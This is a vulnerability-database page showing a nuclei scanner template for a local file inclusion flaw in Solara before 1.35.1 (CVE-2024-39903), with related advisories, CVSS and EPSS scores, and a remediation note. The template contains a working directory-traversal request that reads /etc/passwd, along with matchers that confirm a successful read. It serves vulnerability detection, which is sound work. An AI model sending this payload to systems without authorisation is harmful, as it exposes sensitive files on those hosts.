Lucene search
K

Solara <1.35.1 - Local File Inclusion

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Solara <1.35.1 - Local File Inclusion vulnerability identified and fixe

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-39903
12 Jul 202417:46
circl
CNNVD
Solara Security Breach
12 Jul 202400:00
cnnvd
CVE
CVE-2024-39903
12 Jul 202414:28
cve
Cvelist
CVE-2024-39903 Local File Inclusion in Solara
12 Jul 202414:28
cvelist
Github Security Blog
Local File Inclusion in Solara
12 Jul 202421:00
github
NVD
CVE-2024-39903
12 Jul 202415:15
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
openvas
OSV
CVE-2024-39903 Local File Inclusion in Solara
12 Jul 202414:28
osv
OSV
GHSA-9794-PC4R-438W Local File Inclusion in Solara
12 Jul 202421:00
osv
OSV
PYSEC-2026-1933 Local File Inclusion in Solara
7 Jul 202614:34
osv
Rows per page
id: CVE-2024-39903

info:
  name: Solara <1.35.1 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A Local File Inclusion (LFI) vulnerability was identified in widgetti/solara, in version <1.35.1, which was fixed in version 1.35.1. This vulnerability arises from the application's failure to properly validate URI fragments for directory traversal sequences such as '../' when serving static files. An attacker can exploit this flaw by manipulating the fragment part of the URI to read arbitrary files on the local file system.
  impact: |
    Unauthenticated attackers can exploit LFI to read arbitrary files from the local filesystem.
  remediation: |
    Update Solara to version 1.35.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39903
    - https://github.com/widgetti/solara/commit/df2fd66a7f4e8ffd36e8678697a8a4f76760dc54
    - https://github.com/widgetti/solara/security/advisories/GHSA-9794-pc4r-438w
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
    cvss-score: 8.6
    cve-id: CVE-2024-39903
    cwe-id: CWE-22
    epss-score: 0.02884
    epss-percentile: 0.85177
  metadata:
    fofa-query: icon_hash="-223126228"
    verified: true
    max-request: 1
  tags: cve,cve2024,solara,lfi,vuln

http:
  - raw:
      - |+
        GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: regex
        part: content_type
        regex:
          - "text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201b6fa97c465995375e0ed8028d586661ae0c7057155f58f7ab971435d3fc95ce022100e7b66654785f382992779531c23a04176e0ab9003051df36725239ab13338268:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5 - 8.6
EPSS0.02884
SSVC
32